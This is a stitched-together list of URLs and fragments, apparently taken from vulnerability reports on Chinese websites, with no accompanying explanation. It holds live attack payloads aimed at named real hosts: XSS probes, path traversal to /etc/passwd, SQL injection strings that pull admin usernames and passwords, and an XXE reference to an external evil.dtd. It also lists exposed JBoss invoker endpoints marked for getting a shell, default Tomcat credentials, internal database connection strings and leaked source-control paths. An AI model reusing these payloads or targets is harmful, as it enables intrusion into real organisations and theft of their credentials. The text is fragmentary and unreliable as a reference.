http://www.travel.citic.com/orderSuccess.jsp?routeid=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://www.travel.citic.com/shipList.jsp?shipid=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://www.travel.citic.com/login.jsp?ut=yd&pid=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://www.travel.citic.com/visaDetail.jsp?visaid=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://www.travel.citic.com/shipDetails.jsp?routeid=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://www.travel.citic.com/orderSuccess.jsp?ptype=3&routeid=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://www.bidding.citic.com/news/news!newsList_front.action?newsClassName=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://www.bidding.citic.com/common/error.jsp?url=%2Fpage%2Fmanager&error=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://www.bidding.citic.com/export/export!addExport_front.action?status=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://www.bidding.citic.com/message/message!addMessage_front.action?status=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://customer.cs.ecitic.com/hr/positionAction.do?url=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E&extendUrl=type%3D05&type=05&me https://creditcard.ecitic.com/citiccard/scrm/readme.txt http://bgxf.people.com.cn http://win.999.com.cn/pic.asp?cp_id=188 https://txzb.miit.gov.cn/EC/DM/ECDM0104.jsp?filePath=/etc/passwd&originalFilename=passwd http://www.xiangshe.com/ http://**.**.**/ddqt/_ http://**.**.**/ddqt/notice/_ http://**.**.**/fckeditor/_ http://pingan.hylinkad.com http://pingan.hylinkad.com/admin/admin.php http://pingan.hylinkad.com/phpmyadmin/setup/index.php http://61.182.231.214:8080/AHIS/Login/ http://61.182.231.214:8080/AHIS/PubFrame/UpFile.jsp http://gps.ha-online.cn/index.jsp http://testyun.hpwifi.com/sh2/login.do http://123.56.44.236:8888/ http://123.56.44.236:8192/ http://123.56.44.236:8192/shop/groupbuy_preferential.html?shopid=10293 http://123.56.44.236:8090/ http://123.56.44.236:8090/login.ftl http://123.56.44.236:8090/sapp/login.do http://123.56.44.236:8080/ http://123.56.44.236:8029/ http://123.56.44.236:8013/ http://123.56.44.236:8013/login http://123.56.44.236:7777/ http://hpwifi.com http://yun.hpwifi.com http://p.hpwifi.com http://ad.hpwifi.com http://partner.hpwifi.com http://back.hpwifi.com http://keaiduodcs.m.hpwifi.com http://testp.hpwifi.com http://faq.hpwifi.com http://back.hpwifi.com/back/m.do http://p.hpwifi.com/p/login.do http://partner.hpwifi.com/p/login.do http://ad.hpwifi.com/ad/login.do http://keaiduodcs.m.hpwifi.com/webapp/appindex_getArticleInfo.do http://yun.hpwifi.com/ http://123.56.44.236:8090/sys.jsp https://sso.jrj.com.cn/sso/retrievePwdEmail?rp_id=开头,后面的ID值是不确定的,而且有效时间是12小时,肿么快速定位这个ID呢,别着急,开发人员帮你解决,看下图: http://bugs.edaijia.cn/ http://i.m.yiche.com/ http://jy.nanning.gov.cn/zsgz/201107/t20110706_382640.html http://pcsb.ahau.edu.cn:8080/TCDB/teaAction_about.action?flag=2 http://pcsb.ahau.edu.cn:8080/TCDB/TMDBspectra.zip http://zt.duxiu.com/repository/repositoryMsg/repMsg.jspx?repid=87303 http://jwjg.sasac.gov.cn/login.jsp http://jwjg.sasac.gov.cn/login.action http://space.36kr.com/.git/config http://oa.qust.edu.cn/ http://121.11.160.122/invoker/JMXInvokerServlet http://www.imba.uestc.edu.cn/Administrator/admin_login.aspx http://www.ncl.uestc.edu.cn/main/index/view_article.php?id=1387 http://113.57.156.14:83/pm/ http://www.hhhtgjj.com.cn http://www1.drugadmin.com/flash_upload.php?modelid= http://oms.flnet.com/pages/ http://oms.flnet.com/pages/UserManager/UserPopedom.aspx http://oms.flnet.com/pages/UserManager/Passwordreset.aspx http://oms.flnet.com/pages/UserManager/m_depart_rule.aspx http://oms.flnet.com/pages/UserManager/ChangeRight.aspx http://218.92.28.26/local/admin/admin.asp https://183.129.160.195 https://github.com/joaomatosf/jexboss https://txzb.miit.gov.cn http://used.xcar.com.cn/index.php?carAge=0&cityId=0&color=0&displacement=0&gearbox=0&is_haveimg=0&is_newcar=0&is_sale=1&level=0&mileage=0&pbid=0&price=99&priceBetween[0]=25&priceBetween[1]=&provinceId=0&r=car/search&rank=0&type=0&vframe=0&pserid= http://www.examiner.com.tw/examHistory.php?id=163 http://58.210.227.74:82 http://58.210.227.74:82/web.zip http://lbj.cikuu.com/index.php?a=forceDownload&pdf=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&m=index http://dcrd.cikuu.com/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=e5c2VAMGUQZRAQkIUQQKVwFUAgICVgAIAldVBQFDDQVcV0MUQGkAQxVZZlMEGA9+DjZoK1AHRmUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQ http://www.citcc-4.com.cn/site3/index.php,通过手工尝试,发现存在phpmyadmin数据库管理工具,访问url:http://www.citcc-4.com.cn/phpmyadmin/index.php, http://www.citcc-4.com.cn/admin/leftframe.php,网站报错,网站根目录:D:\www\admin\leftframe.php http://www.citcc-4.com.cn/site3/index6.php http://admin.eryavideo.com/ http://sqlmap.org http://drops.wooyun.org/papers/3451 https://183.224.71.130/+CSCOE+/logon.html http://www.zmdjsw.gov.cn/jmqy/index.asp?type=82 http://218.26.248.201:8080/crm/ http://218.26.248.201:8080/invoker/JMXInvokerServlet,拿shell monitor.cern.ac.cn/login.html http://wap.yirendai.com/yixin/index.php http://218.16.100.212:8080/gionee/weibo/adminManager!login http://218.16.100.212:8080/gionee/weibo/adminManager!login http://218.16.100.212:8080/gionee/weibo/adminManager!login http://bbs.uc.cn/home.php?mod=spacecp http://www.whflsc.com/Web/Welfare/NewInfoList.aspx?channelname=%E9%80%9A%E7%9F%A5%E9%80%9A%E5%91%8A http://210.38.243.169:8080/automation/download.action?name=2013-10-17-15-54-29-2%E5%AF%B9%E8%B1%A1%E6%95%B0%E5%AD%A6%E6%A8%A1%E5%9E%8B.ppt&realname=2%E5%AF%B9%E8%B1%A1%E6%95%B0%E5%AD%A6%E6%A8%A1%E5%9E%8B.ppt LDAP://10.72.54.22:389/dc=china,dc=huawei,dc=com"/ http://localhost.huawei.com:23352/"/ http://3ms.huawei.com/hi/group/1002399/thread_3470599.html?mapId=1732761"/ http://10.69.27.138:8012/"/ https://vpn.btbu.edu.cn/ url:http://124.193.134.214:81/manager/html user:admin pass:admin http://124.193.134.214:81/com.csii.paramgmt.web/reLogin.do http://**.**.**.**/bugs/wooyun-2010-055323 http://202.99.63.183:8080/carbonregproject/login_getJichuShitiItemDetail.action?tblJichuShitiVO.id=2 www.guh-software.de http://27.115.87.18/jijie.shtml http://kc.hljit.edu.cn:8080/zyjh/qt!queryNewView.action?xwid=2 http://**.**.**/ https://**.**.** http://email.citic.com/ http://idc.hust.edu.cn/getNotificationById.php?notificationId=128或可脱裤 http://125.67.61.70:8080/dayunwuliu/login/doLoginOut.action www.77745.com http://www.77745.com//.svn/entries http://wo.weixin.qq.com:2013/ http://wo.weixin.qq.com:2014/ http://wo.weixin.qq.com:8091/ http://wo.weixin.qq.com:8090/ http://investor.skyworth.com/c/ir_circular.php?year=2007 http://app.skyworth.com/admin/ http://info.coocaa.net/CCShop/ShopAlliance/1920/images/znbg2.jpg/.php http://58.18.131.74:8080/xzsp_web/index/index!list.action http://ppcc.ruc.edu.cn/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=111 http://addon.discuz.com/?@ym_xinqing.plugin inurl:plugin.php?id=ym_xinqing http://60.10.25.25:8080/lfkjjh/index/index!index.do http://59.173.7.145:8080/bzpweb/pub_getPublicMain.action http://www.xilaikd.com/ ip:182.92.154.22 http://www.skyworth-ea.com/sysadmin/login.aspx http://www.skyworth-ea.com//UploadFiles/main/Files/2015/4/20150424054233.aspx http://ssvideo.chaoxing.com/recommendlist.asp?order=1 http://sqlmap.org http://think.lenovo.com.cn:8080/support/minisite/thinkpad/htmls/advancedsearch.aspx?doccatid=1250747291546&page=1 http://ma.263em.com/callrecord!getCallRecord.action http://ma.263em.com/messagerecord!getMessagerecord.action http://ma.263em.com/billquery!ygzdmx.action?userid=test@domain.com&type=1&date= http://club.hydron.com.cn/admin/index.php/Index/index.html http://www.1218.com.cn/index.php/company/recruitment?location=%E6%B7%B1%E5%9C%B3&position=%E7%A0%94%E5%8F%91&type=44 http://www.bllib.net.cn:8080/ http://www.msit21.com/ http://202.197.107.11:86/ http://mail.tdsy.org/ http://163.21.191.31/ http://218.2.112.243:8080 http://122.227.160.98:8080/ http://122.225.192.136/ http://58.211.149.42:8000/otomc/user/loginUI.action http://120.194.143.10:8000/otomc/user/loginUI.action http://120.194.111.6:8000/otomc/user/loginUI.action http://120.194.223.10:8000/otomc/user/loginUI.action http://221.176.239.242:8000/otomc/user/loginUI.action http://221.176.177.170:8000/otomc/user/loginUI.action http://58.211.149.42:8000/otomc/user/loginUI.action为例 http://120.194.143.10:8000/otomc/user/loginUI.action http://120.194.111.6:8000/otomc/user/loginUI.action http://120.194.223.10:8000/otomc/user/loginUI.action http://ilife.homelink.com.cn http://apply.huawen.edu.cn/zsxt/editor/admin/login.jsp http://zsgl.usx.edu.cn:8007/zsxt/editor/admin/login.jsp http://whmzxy.cn:8050/zsxt//editor/admin/login.jsp http://218.89.137.19:8080/SCMS/site/luzhoutv/pd/ggpd/644648.shtml http://218.89.137.19:8080/invoker/JMXInvokerServlet,getshell http://kjxy.hrbcu.edu.cn/NewsListaspx.aspx?from=top&level=top&type=txt&Cid=5 http://218.206.165.70:8080/customdev-qhwxcs/xn/hospital/chaxun.action?pageNow=2&medicalName=%E5%B8%82%E7%BA%A7%E5%AE%9A%E7%82%B9%E5%8C%BB%E7%96%97%E6%9C%BA%E6%9E%84%20&fixedPoint=0&areaPinyin=xining http://citiccard.228.com.cn/customer/forgotpassword.html club.chaoxing.com/bbs http://club.chaoxing.com/bbs/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%202%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28username,0x3a,password,0x3a,salt%29%20from%20uc_members%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23 http://demo.74cms.com/android/jobs.php www.epsoft.com.cn/ http://122.227.89.140:8099/qzlss/ylbx1/ddyy.jsp http://122.227.89.140:8099/qzlss/ylbx1/zlml.jsp http://122.227.89.140:8099/qzlss/ylbx1/ypml.jsp http://122.227.89.140:8099 http://222.76.242.84:8083/zwzxsjjhpt/ http://www.aupu.net/plus/ http://sv.sdo.com http://wooyun.org/bugs/wooyun-2010-075231 http://www.hsort.com/ http://zsjggw.xnu.edu.cn/ http://p.hsort.com/ http://dztb.cufe.edu.cn/ http://epaper.btwhw.com/ http://www.yong-gang.com/ http://jx.swufe.edu.cn/sc8/page/schoolspace/course/academycourse-view.do http://210.29.144.172/sc8/page/schoolspace/course/academycourse-view.do http://skyclass.swpu.edu.cn/sc8/page/schoolspace/course/academycourse-view.do http://kcjs.ycit.cn/sc8/page/schoolspace/course/academycourse-view.doo http://skyclass.ypi.edu.cn/sc8/page/schoolspace/course/academycourse-view.do http://skyclass.xzgzy.cn/sc8/page/schoolspace/course/academycourse-view.do http://sky.hhu.edu.cn/sc8/page/schoolspace/course/academycourse-view.do http://skyclass.zufe.edu.cn/sc8/page/schoolspace/course/academycourse-view.do http://boss.tq.cn:8080/tqcrm/login.do jdbc:oracle:thin:@211.151.52.51:18051:tqdb02 jdbc:oracle:thin:@192.168.0.56:18051:tqdb02 http://demo.74cms.com/android/resume.php http://**.**.**/INFOADMIN/ewebeditor/_ http://**.**.**/INFOADMIN/ewebeditor/admin/upload.aspxid=5&dir=../../../_ http://**.**.**/AppConfig.xml_ http://**.**.**/AppConfig.xml_ http://**.**.**/Infoadmin/AppConfig.xml_ http://**.**.**/ewebeditor/admin/upload.aspxid=5&dir=../../../_ http://**.**.**/admin/ewebeditor/admin/upload.aspxid=5&dir=../../../_ http://**.**.**/infoadmin/ewebeditor/admin/upload.aspxid=5&dir=../../../_ http://**.**.**/index.aspx http://tieba.baidu.com/tb/static-itieba3/swf/itiebaVote.swf http://192.168.1.1/config.bin inurl:ecdomain http://www.mzsi.gov.cn/ecdomain/portal/pollproblem.do?method=viewAdvices&id=1* http://tagt.gov.cn/ecdomain/portal/pollproblem.do?method=viewAdvices&id=1* http://www.hecd.lss.gov.cn/ecdomain/portal/pollproblem.do?method=viewAdvices&id=1* http://www.lnpj.hrss.gov.cn/ecdomain/portal/pollproblem.do?method=viewAdvices&id=1* http://www.jlsgjj.cn/ecdomain/portal/pollproblem.do?method=viewAdvices&id=1* http://www.sydpf.org.cn/ecdomain/portal/pollproblem.do?method=viewAdvices&id=1* http://www.shaanxibzzf.gov.cn/ecdomain/portal/pollproblem.do?method=viewAdvices&id=1* http://www.ccfdw.gov.cn/ecdomain/portal/pollproblem.do?method=viewAdvices&id=1* http://www.gslz.lss.gov.cn/ecdomain/portal/pollproblem.do?method=viewAdvices&id=1* http://cygjj.gov.cn/ecdomain/portal/pollproblem.do?method=viewAdvices&id=1* http://www.jlyb.lss.gov.cn/ecdomain/portal/pollproblem.do?method=viewAdvices&id=1* http://www.lulong.gov.cn/ecdomain/portal/pollproblem.do?method=viewAdvices&id=1* http://www.tqyb.cc/ecdomain/portal/pollproblem.do?method=viewAdvices&id=1* http://dzh.smesd.gov.cn/ecdomain/portal/pollproblem.do?method=viewAdvices&id=1* http://wf.smesd.gov.cn/ecdomain/portal/pollproblem.do?method=viewAdvices&id=1* http://www.tj.lss.gov.cn/ecdomain/portal/pollproblem.do?method=viewAdvices&id=1* http://www.hext.lss.gov.cn/ecdomain/portal/pollproblem.do?method=viewAdvices&id=1* http://www.smesd.gov.cn/ecdomain/portal/pollproblem.do?method=viewAdvices&id=1* http://www.cygjj.gov.cn/ecdomain/portal/pollproblem.do?method=viewAdvices&id=1* http://jin.smesd.gov.cn/ecdomain/portal/pollproblem.do?method=viewAdvices&id=1* http://life.365jilin.com/html/2046119.shtml http://139.210.38.70/ http://xgc.ylsy.edu.cn http://www.cscline.com/ http://218.25.176.119:8080/e3/rbop/login.jsp http://218.25.176.119:8080/invoker/JMXInvokerServlet http://www.17u.net/travellist/linequeryJson http://citiccard.228.com.cn/personAlinForMation/deductintegrals http://221.239.120.214:8888/console/ http://218.16.100.212:8080/gionee/weibo/adminManager!login http://218.16.100.212:8080/admin-console http://www.springcocoon.com/AjaxCheck.aspx?f=1&GeneralID=127&cPwd=123456 http://www.wooyun.org/bugs/wooyun-2015-0110073/trace/a738240653a773676f3599ac0acf3e53 http://111.160.55.68:8080/invoker/JMXInvokerServlet http://61.181.252.74:8888/invoker/JMXInvokerServlet http://221.239.45.204:8888/invoker/JMXInvokerServlet http://222.66.158.208:9080/invoker/JMXInvokerServlet http://59.60.6.234/invoker/JMXInvokerServlet http://119.167.117.200:8080/invoker/JMXInvokerServlet http://180.169.85.107:9080/invoker/JMXInvokerServlet www.yqing.cn http://**.**.**/_ http://**.**.**/ http://**.**.**/ https://account.guokr.com https://www.itouzi.com/newuser/index/reg?ret_url=http%3A%2F%2Fwww.itouzi.com http://www.piaoyou.org/ http://demo.piaoyou.org http://oa.starstrip.net/ http://demo.piaoyou.org http://oa.starstrip.net/ http://www.yeehang.cc/ http://kq.4000211929.com/ http://sl.4000211929.com/ http://zw.jiritong.com/ http://dzy.4000211929.com/ http://oa.yccas.com/ http://hxd.4000211929.com/ http://wh.4000211929.com/ http://sdn.4000211929.com/ http://yps.4000211929.com/ http://yb.4000211929.com/ http://huanyu.4000211929.com/ http://jy.4000211929.com/ http://oa.wuzhouair.com/ http://lq.4000211929.com/ http://xiykh.4000211929.com/ http://cz.4000211929.com/ http://wdm.4000211929.com/ http://py.4008836868.com/ http://hnsc.4000211929.com/ http://asdsad/ http://www.228.com.cn/cart/modifyOrder.html?orderId=8990524 http://www.228.com.cn/cart/modifyOrder.html?orderId=8990528 http://www.228.com.cn/cart/modifyOrder.html?orderId=8990536 http://www.228.com.cn/cart/modifyOrder.html?orderId=8990554 http://www.228.com.cn/cart/modifyOrder.html?orderId=8990568 http://www.1110086.com/ http://zz.1110086.com/ http://www.1110086.com/跳转到http://203.86.9.21/ http://wowdb.tgbus.com/itemSets.html?n=龙父之牙 http://wowdb.tgbus.com/itemSets.html?n=龙父之牙 http://wowdb.tgbus.com/itemSets.html?n=龙父之牙 http://wowdb.tgbus.com/itemSets.html?n=龙父之牙 http://wowdb.tgbus.com/itemSets.html?n=龙父之牙 http://wowdb.tgbus.com/itemSets.html?n= http://wowdb.tgbus.com/itemSets.html?n= http://demo.74cms.com/android/login.php http://ilife.homelink.com.cn/aigou/?m=ProductList&a=seachProList&orderid=3 http://ilife.homelink.com.cn/aigou/?m=ProductList&a=seachProList&orderid=3 http://www.geodata.cn/Portal/metadata/downloadData.jsp?id=100101-38&isCookieChecked=true一试便知 http://www.dlgas.com/gas/news/readNews.jsp?id=20121012093857754一试便知 http://218.26.1.143:8080/dxswjc/login.jsp http://218.26.1.143:8080/admin-console,可通过部署war拿shell http://e.xdf.cn/Teacher/search www.edpbook.com.cn截图: http://www.edpbook.com.cn/admin.php http://www.5fax.net/ http://119.145.255.46:8888/ http://202.104.186.93/ http://113.105.225.250:8888/ http://211.154.136.8:8080/ http://113.105.225.250/ http://124.232.137.215/ http://202.105.179.216:8888/ http://202.105.179.171:8888/ http://202.104.186.94:8888/ http://www.fax400800.net/ http://www.51fax.com/ http://www.ltfax.net:8080/ http://www.baoyuefax.com/ http://fax998.cn/ http://www.02309.com/ http://www.hdf518.net/ http://www.258fax.com/ http://sz.mmfax.com/ http://www.518fax.cn/ http://www.168talk.net/ http://hi.fax10000.net/ http://258fax.com:8888/ http://www.zz.cn/xxgk/xxgkml_find.asp www.zz.cn http://weixin.jstv.com/index.php/top/login_index.php http://**.**.**/ http://dev.game.gionee.com/ http://www.xiaodao360.com//.svn/entries http://www.xiaodao360.com/xd2014.sql http://121.33.200.103:8080/front/Portal/list.do http://www.lib.ruc.edu.cn/webs/list/notice/53.html http://116.228.55.149:8082/helpdesk/privilege/loginAction!login2.action http://116.228.55.149:8082/helpdesk/jiushao.jsp jdbc:mysql://192.168.139.220:3306/helpdesk_g3 jdbc:mysql://192.168.139.220:3306/helpdesk_g3 jdbc:mysql://192.168.139.220:3306/helpdesk_g3_quartz resin:import http://card.118114.net:8080/sdm/ http://bbs.heilanhome.com/yaowen/168bjlzmw/ http://bbs.heilanhome.com/forumdata/cache/nst.php http://bbs.1006.tv/subject/ajax_subject_add_jing/?pub_id=30&subject_id=189148&uid_to=3179139 http://bbs.1006.tv/subject/ajax_subject_make_top/?pub_id=30&subject_id=18914&uid_to=3179139&top_sta=2 http://bbs.1006.tv/jifen/ajax_subject_score/?do_score=5&do_reason=1&pub_id=45&subject_id=188936&operate_id=1&uid_to=3179139 http://211.144.96.183:8080/anonymous/login.xhtml http://www.tnt.com.cn/ http://211.152.44.18:8080/coms/COwebsite/changeLocale.do http://get.appvv.com/ring/ring/search/s/ddd http://ring.appvv.com/search-dd'_1/ http://www.piaoyou.org/ http://demo.piaoyou.org/ http://demo.piaoyou.org http://www.roadmaint.cn:3333/ http://www.piaoyou.org/ http://demo.piaoyou.org/ http://demo.piaoyou.org http://cs.e-learning.haier.com:7001/console/ http://**.**.**/index.php/Public/login https://account.chsi.com.cn/account/preregister.action?from=archive-login http://s.zhulong.com//.svn/entries admin:language=cn go.hupu.com/u?url= CSRF:bbs回帖处 http://go.hupu.com/u?url=http://x.x.x.x/csrf.html http://www.skyworth-ea.com/cn/index.aspx http://www.skyworth-ea.com/cn/product/index.aspx?nodecode=105007001 http://www.skyworth-ea.com/cn/product/productdetail.aspx?id=100000087271587 http://www.skyworth-ea.com/en/search.aspx?val=a http://www.skyworth-ea.com/en/product/category.aspx?nodecode=105012001003 http://www.skyworth-ea.com/en/news/newsdetail.aspx?id=100000030389525&nodecode=105011001 http://www.fengniao.com/active/20091123_interview/list.php?type=1 http://es.gongchang.com//.svn/entries http://ar.gongchang.com//.svn/entries http://ar.gongchang.com/ http://t.cn/***** http://www.codoon.com/backend/newsfeed/comment_list http://www.codoon.com/backend/newsfeed/ http://www.njiairport.com:8001/ ftp://221.6.39.242/ ftp://221.6.39.242/tools/ ftp://221.6.39.242/tools/集成备份 com:haodai2013 com:haodai2013 com:lzm123456 http://114.141.189.90/ocs/AjaxCollectAction.action?cmd=downloadPdfFromLocal com:t***** com:t***** com:t***** http://localhost:9200/_nodes https://github.com/jiangjiangwei/ZTO,发现一处URL http://122.225.100.102:10000/GKPDA/commonPost.rubink file:///C:/Windows/win.ini http://ip/evil.dtd http://ip/?%file http://**.**.**/AskList.aspxkey=-1 https://wohovfor.worktile.com/calendar http://www.china-cgzb.com/first/firstAction_showJiChuXinXiSanJi http://www.china-cgzb.com/first/firstAction_showJiChuXinXiSanJi http://122.226.178.67:86/main/login.action http://122.226.178.67:86/ZFWH/system/login.action url:http://www.crcctc.com http://www.crcctc.com/webtj/admin_login.php url:http://gl.tiantianfm.com/apply.html http://gl.tiantianfm.com/request.html http://www.gxhzzyy.com/guestbook/index.php?keyid=phpcms http://www.952111.com/ http://esp.haier.com/CVS/Root url:http://www.cr126.com/index.aspx www.jlu.edu.cn。然后发现了网络中心 http://img4.imgtn.bdimg.com/it/u=574793251,2088439437&fm=21&gp=0.jpg http://dsp.cig.com.cn http://bind.17500.cn/?c=find http://182.254.151.41/ http://cos.sto.cn/login/Login.jsp?logintype=1 http://www.taojuan.cn:8181/ShopGoods/view/mall_find.do?spcid=P05&resourceTypeId=1 http://my.its.csu.edu.cn/MyInformation/MyPasswordModify_2/****(学工号) http://gefco.cae.com.cn:443/Default.aspx http://www.codoon.com/backend/gorup http://www.homelinkhr.com/view_getPostInfoForCustomer.action?id=150 http://www.yintai-centre.com/ http://www.yintai-centre.com/beijing/cn/mall/activitys.php?id=MjM= http://www.yintai-centre.com/beijing/cn/mall/activitys.php?id=MjMn http://www.yintai-centre.com/beijing/cn/mall/activitys.php?id=LTIzIFVOSU9OIFNFTEVDVCAxLDIsMyw0LDUsNiw3LDgsOQ== http://www.yintai-centre.com/beijing/cn/mall/activitys.php?id=LTIzIFVOSU9OIFNFTEVDVCAxLDIsMyw0LDUsNixjb25jYXQodXNlcigpLEBAZGF0YWRpcixkYXRhYmFzZSgpLHZlcnNpb24oKSksOCw5 http://www.yintai-centre.com/beijing/cn/mall/activitys.php?id=LTIzIFVOSU9OIFNFTEVDVCAxLDIsMyw0LDUsNixncm91cF9jb25jYXQoZGlzdGluY3QgdGFibGVfbmFtZSksOCw5ICBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYT0weDY4NjQ2RDMwMzUzNzMwMzQzMTM1NUY2NDYy http://www.yintai-centre.com/beijing/cn/mall/activitys.php?id=LTIzIFVOSU9OIFNFTEVDVCAxLDIsMyw0LDUsNixncm91cF9jb25jYXQoZGlzdGluY3QgY29sdW1uX25hbWUpLDgsOSAgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9uYW1lPTB4NjE2NDZENjk2RQ== http://www.yintai-centre.com/beijing/cn/mall/activitys.php?id=LTIzIFVOSU9OIFNFTEVDVCAxLDIsMyw0LDUsNixjb25jYXQodXNlcm5hbWUscGFzc3dkKSw4LDkgIGZyb20gYWRtaW4= http://union.lashou.com/?r=setting%2Fbank%2Fzhaoshangcities http://61.129.89.187:8080/manager/authmgr/login.jsp http://pm.chaoxing.com/ http://pm.chaoxing.com/projects http://218.244.150.173:15672/ http://121.40.106.215:15672/ http://www.bxfgj.gov.cn/webbargainbx/presellbuild.aspx?buildcode=10088 http://218.89.108.173:8080/presellbuild.aspx?buildcode=12924016621001 http://58.59.112.106/presellbuild.aspx?buildcode=13146875771001 http://www.lysfgj.com:81/presellbuild.aspx?buildcode=13505442591005 http://www.jxfgj.com:8081/presellbuild.aspx?buildcode=12184229631001 http://www.bzfcj.gov.cn:9090/presellbuild.aspx?buildcode=13383658521213 http://www.lsfcj.com/presellbuild.aspx?buildcode=120150211000100001 http://gpsfcgls.com/presellbuild.aspx?buildcode=14199918731003 http://bind.17500.cn/admin.php?a=login&c=Login userId:M2191644 userId:M2191572 http://ie.yy.com/theme/themeCenter.html http://211.95.79.237:8080/ http://club.show.sina.com.cn http://club.show.sina.com.cn/viewthread.php?tid=633737 http://rw.baidu.com/ http://whjtj.gov.cn/loginjson/login.action http://61.49.38.101:8080 http://hd.221.gov.cn http://124.165.223.210:8080 http://61.189.223.215:8080 http://211.144.105.113:8080 http://59.44.131.38:8080 http://218.25.115.4:8080 http://218.90.141.238:8080 http://218.80.224.36:8080 http://61.163.86.141:8080 http://115.182.54.239:8080 http://218.80.236.38:8080 http://1.207.62.209:8080 http://58.133.250.20:8080 http://58.221.250.57:8080 http://180.168.28.132:8080 http://219.137.166.79:8080 http://122.194.76.218:8080 http://119.44.222.238:8080 http://124.16.224.225:8080/invoker/JMXInvokerServlet http://112.124.23.240:8000/ http://112.124.4.196:8000/ http://www.charity.gov.cn/fsm/cms/site/cms_site_template_upload.jsp http://**.**.**/c6/JHSoft.Web.customquery/UploadImageDownLoadIn.aspxFileID=1 http://112.124.23.240:28017/ http://115.28.222.146:28017/ redis_version:2.8.19 redis_git_sha1:00000000 redis_build_id:1ff65346083e56ee redis_mode:standalone os:Linux multiplexing_api:epoll gcc_version:4.8.2 run_id:8f7d473b215b652632d089ecdf9c2edbfd68494a tcp_port:6379 uptime_in_seconds:6891560 lru_clock:3866773 config_file:/etc/redis/redis.conf used_memory:1264104 used_memory_human:1.21M used_memory_rss:9080832 used_memory_peak:1794160 used_memory_peak_human:1.71M used_memory_lua:35840 mem_fragmentation_ratio:7.18 mem_allocator:jemalloc-3.6.0 rdb_last_save_time:1429928660 total_connections_received:4710 total_commands_processed:1510285 total_net_input_bytes:763576720 total_net_output_bytes:2741477552 instantaneous_input_kbps:0.00 instantaneous_output_kbps:0.00 expired_keys:141834 keyspace_hits:1139624 keyspace_misses:132713 latest_fork_usec:265 role:master repl_backlog_size:1048576 used_cpu_sys:6367.73 used_cpu_user:3874.02 used_cpu_sys_children:17.20 used_cpu_user_children:8.99 db0:keys=248,expires=248,avg_ttl=661193005 db1:keys=4,expires=0,avg_ttl=0 db6:keys=1,expires=0,avg_ttl=0 db7:keys=4,expires=0,avg_ttl=0 http://202.99.19.194:8080/projectname/reglogins/entity/iczsupplyreginfo/index.do http://202.99.19.194:8080/projectname/reglogins/entity/iczsupplyreginfo/index.do jboss-4.0.4.GA/server/default/./deploy/jbossweb-tomcat55.sar/ROOT.war/ http://202.99.19.194:8080/projectname/reglogins/entity/iczsupplyreginfo/index.do jboss-4.0.4.GA/server/default/./deploy/jbossweb-tomcat55.sar/ROOT.war jboss-4.0.4.GA/bin jboss-4.0.4.GA/bin/run.jar:/web/jdk1.6.0_27/lib/tools.jar http://125.35.6.54/sfdaic/jsp/index1.jsp http://125.35.6.54/sfdaic/html/20150330102730083679721.jsp http://125.35.6.54/sfdaic/sys.jsp http://125.35.6.54/sfdaic/system.jsp http://125.35.6.54/sfdaic/sysinfo.jsp http://125.35.6.54/sfdaic/tools/userbox/lcx.jsp http://125.35.6.54/sfdaic/sys/import/import.jsp http://125.35.6.54/sfdaic/sys/import/importsubmit.jsp http://125.35.6.54/sfdaic/cms/web/upload.jsp http://125.35.6.54/sfdaic/site_template/maindemo/dbsql/fsm_cms2.sql http://114.80.98.69:80/games/account_safe?gid=41&tid=291 http://easemob.com) http://221.239.120.206/zlbpro/zlbPage/index_page_4.action http://www.yohobuy.com/home/user/memberinfo http://202.109.255.73:8080/redem/index1.jsf http://202.109.255.73:8080/jmx-console_hymake http://202.109.255.73:8080/invoker/JMXInvokerServlet http://www.ias.fudan.edu.cn/Circs/Default.aspx?Cid=298%27 http://www.ias.fudan.edu.cn/File.aspx?filepath=File.aspx http://www.ias.fudan.edu.cn/manage_ias/FCKeditor/editor/filemanager/connectors/test.html http://www.ias.fudan.edu.cn/userfiles/file/ok.asp/1%281%29.jpg http://www.physics.fudan.edu.cn/tps/sites/phygsu/newtest/editor/admin_uploadfile.asp?id=14&dir=../ http://www.urp.fudan.edu.cn:86/epstar/web/swms/mainframe/home/index.jsp http://www.urp.fudan.edu.cn:99/ http://www.ao.fudan.edu.cn/fudan/studentLogin!index.action http://www.icescjcx.fudan.edu.cn/ http://jxjd.fudan.edu.cn/JXJD/index.asp http://fdtch.fudan.edu.cn/ http://eb.fudan.edu.cn/fdu/login.aspx http://heartlab.fudan.edu.cn/login.jsp http://ecology.fudan.edu.cn/51eweb_sysadmin/Default.aspx http://www.library.fudan.edu.cn/home.action?method=foundPwd http://bkcms.fdsm.fudan.edu.cn/login.jsp http://www.library.fudan.edu.cn/login.action www.stuaff.fudan.edu.cn/index.aspx‎ www.fudan.edu.cn 